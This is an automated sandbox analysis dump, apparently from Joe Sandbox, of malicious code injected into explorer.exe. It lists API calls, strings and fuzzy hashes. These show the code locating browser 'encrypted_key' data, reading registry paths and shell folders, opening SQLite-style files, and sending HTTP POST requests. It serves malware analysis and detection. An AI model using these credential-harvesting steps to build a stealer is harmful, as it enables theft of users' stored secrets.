  • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
  • Part of subcall function 0043106C: lstrlen.KERNEL32(02A565AE,00000000,00000000,00000000,00431366,76228A60,02A565AE,00000000), ref: 00431074
  • Part of subcall function 0043106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02A565AE,00000001,00000000,00000000), ref: 00431086
  • Part of subcall function 004312A3: RtlZeroMemory.NTDLL(?,00000018), ref: 004312B5
• RtlZeroMemory.NTDLL(?,0000003C), ref: 004313C2
• wsprintfW.USER32 ref: 004314B5
• RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00431594
Strings
• Accept: */*Referer: %S, xrefs: 004314AF
• POST, xrefs: 00431465
• Content-Type: application/x-www-form-urlencoded, xrefs: 004314FB
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
• String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
• API String ID: 3833683434-704803497
• Opcode ID: 51a8f09065b5e4e4bef2c97e8e36c558d2670e3e96d9db6cf9712ebeff319e4e
• Instruction ID: 3bbafe940943dc6f4cdd405cbcd8d9a3d3f7e45b7ea613c109dc022c9b4a2862
• Opcode Fuzzy Hash: 51a8f09065b5e4e4bef2c97e8e36c558d2670e3e96d9db6cf9712ebeff319e4e
• Instruction Fuzzy Hash: D6717970608301AFD7549F65DC88A2FBBE9EB88344F00592EF955D3262DB38DD048B5A

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: memcpy$FileReadmemset
• String ID: winRead$SH
• API String ID: 2051157613-3770183200
• Opcode ID: de055421dd6964a9f9218ce99b98db4be6b8af024dd66989f64ae7d72cc05319
• Instruction ID: d0082008dab0a1f47317ffbb5ef472d7f62856dea9cbc27ffc455e370c7e6f0c
• Opcode Fuzzy Hash: de055421dd6964a9f9218ce99b98db4be6b8af024dd66989f64ae7d72cc05319
• Instruction Fuzzy Hash: 7331CE32208300AFC740DE19CC8599FB7E6EFD8314F84692AF98587310D678EC258B9B

                                                                                                                             Control-flow Graph: function 0043A67C-0043A740 (basic blocks 667-688; calls _alldiv and _allmul; the executed/not-executed colouring of the rendered graph is not reproduced here)
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File_alldiv_allmul
                                                                                                                            • String ID: @TH$winTruncate1$winTruncate2
                                                                                                                            • API String ID: 3568847005-1035160094
                                                                                                                            • Opcode ID: 6503685d69a2283648e846f700648fd23395ab5c9aa71f08d9c9039f15587a6d
                                                                                                                            • Instruction ID: 1d5520689964af2132963533dec8b2872f7fc675543f0af680feead7463845ac
                                                                                                                            • Opcode Fuzzy Hash: 6503685d69a2283648e846f700648fd23395ab5c9aa71f08d9c9039f15587a6d
                                                                                                                            • Instruction Fuzzy Hash: DA21D371240100ABCB149E29CCC5E6B37A9EF88310F15912FFD94CB295D738DC20C7AA

                                                                                                                             Control-flow Graph: function 0043B87B-0043BAF9 (basic blocks 715-785; calls memset and CreateFileW; the executed/not-executed colouring of the rendered graph is not reproduced here)
                                                                                                                            APIs
                                                                                                                            • memset.NTDLL ref: 0043B8D5
                                                                                                                            • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0043B96F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFilememset
                                                                                                                            • String ID: psow$winOpen$SH
                                                                                                                            • API String ID: 2416746761-2626843210
                                                                                                                            • Opcode ID: e1c33f019aa7778aa3ab4493f41131532cdecafba25ffbb2c1b7423441d54f7b
                                                                                                                            • Instruction ID: a6bc3635bf1e25f794eeb70a581a1d6f23cd2750c812a04803b1acaee0b060a9
                                                                                                                            • Opcode Fuzzy Hash: e1c33f019aa7778aa3ab4493f41131532cdecafba25ffbb2c1b7423441d54f7b
                                                                                                                            • Instruction Fuzzy Hash: A7715D71A04702AFC710EF25C88175AB7E0FF8C724F105A2EFA6497291D778D954CB9A

                                                                                                                             Control-flow Graph: function 0043B1E5-0043B3F0 (basic blocks 786-837; calls CreateFileMappingW and MapViewOfFile; the executed/not-executed colouring of the rendered graph is not reproduced here)
                                                                                                                            APIs
                                                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0043B31D
                                                                                                                            • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0043B34F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CreateMappingView
                                                                                                                            • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                            • API String ID: 3452162329-3826999013
                                                                                                                            • Opcode ID: ec717a08e84435863a6d271e62e014d01d5b6bbef76d553b3785065585038ead
                                                                                                                            • Instruction ID: a0e467136780de40f2a8627eaab18dc84a20e703b189a6ae14bd09a80cbad918
                                                                                                                            • Opcode Fuzzy Hash: ec717a08e84435863a6d271e62e014d01d5b6bbef76d553b3785065585038ead
                                                                                                                            • Instruction Fuzzy Hash: FB51AD712007019FDB25CF18C845B2B77E6FB98314F10992FEA928B391DB78E815CB99
                                                                                                                            APIs
                                                                                                                            • StrStrIW.KERNELBASE(?,?), ref: 00432E4B
                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00432EE4
                                                                                                                            • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00432F54
                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00432F62
                                                                                                                              • Part of subcall function 004319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A1E
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A3C
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A75
                                                                                                                              • Part of subcall function 004319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A98
                                                                                                                              • Part of subcall function 00431BC5: lstrlenW.KERNEL32(00000000,00000000,?,00432E75,PathToExe,00000000,00000000), ref: 00431BCC
                                                                                                                              • Part of subcall function 00431BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00432E75,PathToExe,00000000,00000000), ref: 00431BF0
                                                                                                                              • Part of subcall function 00431BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00432E75,PathToExe,00000000,00000000), ref: 00431C05
                                                                                                                              • Part of subcall function 00431BC5: lstrlenW.KERNEL32(00000000,?,00432E75,PathToExe,00000000,00000000), ref: 00431C1C
                                                                                                                              • Part of subcall function 00431AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00432E83,PathToExe,00000000,00000000), ref: 00431B16
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                            • String ID: PathToExe
                                                                                                                            • API String ID: 1799103994-1982016430
                                                                                                                            • Opcode ID: d608d5956f4985029cd672ee6a6a8a64bd6e50e5c64ce2fa66d8bcb30781278b
                                                                                                                            • Instruction ID: 2129266762c8c0cc6f028d735e58088ff0b719dae3c445dd3c930010b6e24de6
                                                                                                                            • Opcode Fuzzy Hash: d608d5956f4985029cd672ee6a6a8a64bd6e50e5c64ce2fa66d8bcb30781278b
                                                                                                                            • Instruction Fuzzy Hash: F43190716042116F8719AF22CC16D6F7AA9EFC8354F00552EF86987351DA78C901DBAA
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • wsprintfW.USER32 ref: 00434AA2
                                                                                                                            • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00434AC7
                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00434AD4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                            • String ID: %s\%08x$Software
                                                                                                                            • API String ID: 1800864259-1658101971
                                                                                                                            • Opcode ID: ace7b9dcff5b0795f623521590971dc8fa983b4b784196532be4db1011919f94
                                                                                                                            • Instruction ID: 2869166b569ad2205bbe38c6041ee9884972b216249653eaf0a3df5653071a5f
                                                                                                                            • Opcode Fuzzy Hash: ace7b9dcff5b0795f623521590971dc8fa983b4b784196532be4db1011919f94
                                                                                                                            • Instruction Fuzzy Hash: FA012F71600008BFDB08AF80DC8AEBF77ACEB49348F10007FF600A3110EAB06E809669
                                                                                                                            APIs
                                                                                                                            • _alloca_probe.NTDLL ref: 0043431C
                                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00434335
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00434363
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004343C8
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                              • Part of subcall function 0043418A: wsprintfW.USER32 ref: 00434212
                                                                                                                              • Part of subcall function 00431011: GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                              • Part of subcall function 00431011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004343B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 801677237-0
                                                                                                                            • Opcode ID: 080779346a19376a2b777ed0994af651509166e24e04109a0d26e02f177ca409
                                                                                                                            • Instruction ID: f43282f0029a6959182e388e0f6ea3e3545c232c9c74e1fa65d8b3a39a0ed68b
                                                                                                                            • Opcode Fuzzy Hash: 080779346a19376a2b777ed0994af651509166e24e04109a0d26e02f177ca409
                                                                                                                            • Instruction Fuzzy Hash: F11103B12042057FE715EB11DC45DBF77EDEB88348F00493EB949D2150EB78AD449B6A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000497000.00000040.80000000.00040000.00000000.sdmp, Offset: 00497000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_497000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: df094dd86e25509f5de35ca07a1e407cc031daf0f4651a549572ba074fcb0573
                                                                                                                            • Instruction ID: a4683cc430775c54a3350699d263516dd21090b698549e5d054b9c8fb9ab8b61
                                                                                                                            • Opcode Fuzzy Hash: df094dd86e25509f5de35ca07a1e407cc031daf0f4651a549572ba074fcb0573
                                                                                                                            • Instruction Fuzzy Hash: 7BA13A725186525BDF228E7CCCC06A17F90EB56324B2D067EC9D18B3C2E7685C07C759
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A1E
                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A3C
                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A75
                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A98
                                                                                                                              • Part of subcall function 00431011: GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                              • Part of subcall function 00431011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 217796345-0
                                                                                                                            • Opcode ID: f1edc0a684e0e222f9cc3c4f37dd72ca392ed68e0ce09d08a8780c1f411ca93c
                                                                                                                            • Instruction ID: 1ccc4929eeaf5a582f9c977e6ccd55a0c10322cc5413a3b512cdd2f1f1d0ac3c
                                                                                                                            • Opcode Fuzzy Hash: f1edc0a684e0e222f9cc3c4f37dd72ca392ed68e0ce09d08a8780c1f411ca93c
                                                                                                                            • Instruction Fuzzy Hash: C821E772206345AFE7249B21CD04F3B77E8EFCD759F001A2EF58592260D628CD40872A
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00431ED5
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00431F0C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00431F98
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                            • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00431F82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1077800024-0
                                                                                                                            • Opcode ID: 750ee0c41b6b67ee7828045ad8b997b2da945e5bbbc5ee07ce2378917cc66559
                                                                                                                            • Instruction ID: 90d6705c5841a16fa1d43b808314c35bcf1acdc0e71b44c4216f316babd796f5
                                                                                                                            • Opcode Fuzzy Hash: 750ee0c41b6b67ee7828045ad8b997b2da945e5bbbc5ee07ce2378917cc66559
                                                                                                                            • Instruction Fuzzy Hash: 252151712083416FD705AB21DC45D2F7BEDEF8D358F00592EF49992260DB79C905DB26
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00433E1E,00000000,?,00433FA8), ref: 00431C46
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00433FA8), ref: 00431C56
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00433FA8), ref: 00431C91
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00433FA8), ref: 00431C76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2517252058-0
                                                                                                                            • Opcode ID: 06eb32add6240f0a793eed4b82eac5faa8fad9f7c27363e4d0b461628090d41c
                                                                                                                            • Instruction ID: f58f94a93fd8a76c8d961baa6f53adc1d70afcf191dd552b82e5a73b1bc66a7b
                                                                                                                            • Opcode Fuzzy Hash: 06eb32add6240f0a793eed4b82eac5faa8fad9f7c27363e4d0b461628090d41c
                                                                                                                            • Instruction Fuzzy Hash: 7DF0F4312002187BD2245F26DC88E7F7A5CDB4B7F9F12172EF915921A1DB1A5C01427C
                                                                                                                            APIs
                                                                                                                            • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00433E30,00000000,00000000,?,00433FA8), ref: 00432FC1
                                                                                                                            • lstrlen.KERNEL32("encrypted_key":",?,00433FA8), ref: 00432FCE
                                                                                                                            • StrStrIA.SHLWAPI("encrypted_key":",0048692C,?,00433FA8), ref: 00432FDD
                                                                                                                              • Part of subcall function 0043190B: lstrlen.KERNEL32(?,?,?,?,00000000,00432783), ref: 0043192B
                                                                                                                              • Part of subcall function 0043190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00432783), ref: 00431930
                                                                                                                              • Part of subcall function 0043190B: lstrcat.KERNEL32(00000000,?), ref: 00431946
                                                                                                                              • Part of subcall function 0043190B: lstrcat.KERNEL32(00000000,00000000), ref: 0043194A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcat
                                                                                                                            • String ID: "encrypted_key":"
                                                                                                                            • API String ID: 493641738-877455259
                                                                                                                            • Opcode ID: f64e6089d9344851f781a634403936a5364875a002928447fcb8afbbcb4a608f
                                                                                                                            • Instruction ID: 248c4bf99aad6bc820a98a613c578d0b51f14fa19f4a594c7e4924ac255bef3a
                                                                                                                            • Opcode Fuzzy Hash: f64e6089d9344851f781a634403936a5364875a002928447fcb8afbbcb4a608f
                                                                                                                            • Instruction Fuzzy Hash: C4E09B72609A646F83A56BB91C5894F7F5CAE0A61570A047AF50197213DF998801D3AC
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0043BB40
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID: winDelete
                                                                                                                            • API String ID: 3188754299-3936022152
                                                                                                                            • Opcode ID: 9affb1942672b0aa136b5f2f39742b6e1948f02d29bd6170179affab7c79c8b0
                                                                                                                            • Instruction ID: 2b57f0a585499d123026b7ee8de308b40b580a2f8fddc38c12d08ef168d3248d
                                                                                                                            • Opcode Fuzzy Hash: 9affb1942672b0aa136b5f2f39742b6e1948f02d29bd6170179affab7c79c8b0
                                                                                                                            • Instruction Fuzzy Hash: 2211E531A00208EB8710AB658842A7EB775DF99760F10616BEA42D7794DF38AD0297DA
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431011: GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                              • Part of subcall function 00431011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00432EE4
                                                                                                                            • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00432F54
                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00432F62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1066184869-0
                                                                                                                            • Opcode ID: e8bc8986706d98e1410642239f6414fced19a6a6c2fabb99bc60ea76ecacb0d1
                                                                                                                            • Instruction ID: 3a389d19b97f46651b893b1ba779a083bed3ae6ab70b4b3decab3a45fb97eea5
                                                                                                                            • Opcode Fuzzy Hash: e8bc8986706d98e1410642239f6414fced19a6a6c2fabb99bc60ea76ecacb0d1
                                                                                                                            • Instruction Fuzzy Hash: 0001D635204250ABC719AF22DC05D6F7FB9EFCD358F00443EF81982160CA398845EBAA
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitInitializeProcessUninitialize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4175140541-0
                                                                                                                            • Opcode ID: 6a616c290e7709dc527bdbb42e6b90dea176575cf3692c0bbb8aa4a84ba368d2
                                                                                                                            • Instruction ID: cdcad3cdf69ff745295f11d1b6cef45371f2a4bf8c9d1fca54ea571b7c81e596
                                                                                                                            • Opcode Fuzzy Hash: 6a616c290e7709dc527bdbb42e6b90dea176575cf3692c0bbb8aa4a84ba368d2
                                                                                                                            • Instruction Fuzzy Hash: 32C09B303441004BE6C03FF15C0D74D3614EF44727F0158ADF20DC50A1DB5464009B3E
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00439FF8
                                                                                                                            Strings
                                                                                                                            • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0043A00E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHeap
                                                                                                                            • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                            • API String ID: 10892065-982776804
                                                                                                                            • Opcode ID: 831a35854963246e8725b4200501b28da5614a87eb6b3f7e817c9f79a1424388
                                                                                                                            • Instruction ID: b91165095fc7e8d730bd8fae112f3ce09205104953419c03fb2733ee45d4dd72
                                                                                                                            • Opcode Fuzzy Hash: 831a35854963246e8725b4200501b28da5614a87eb6b3f7e817c9f79a1424388
                                                                                                                            • Instruction Fuzzy Hash: F5F02B72648341BBE7301E54DC88F2767ACD79C789F20183BF986D2240E2B8AC01833D
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00432E83,PathToExe,00000000,00000000), ref: 00431B16
                                                                                                                              • Part of subcall function 00431011: GetProcessHeap.KERNEL32(00000000,00000000,?,00431A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2), ref: 00431020
                                                                                                                              • Part of subcall function 00431011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431027
                                                                                                                              • Part of subcall function 004319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A1E
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A3C
                                                                                                                              • Part of subcall function 004319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00431A75
                                                                                                                              • Part of subcall function 004319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A98
                                                                                                                            Strings
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00431B40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                            • API String ID: 2162223993-2036018995
                                                                                                                            • Opcode ID: 5fd5837eb178fd12c739eba98a902e93e94e63e485a28a47c4b1e42123986e93
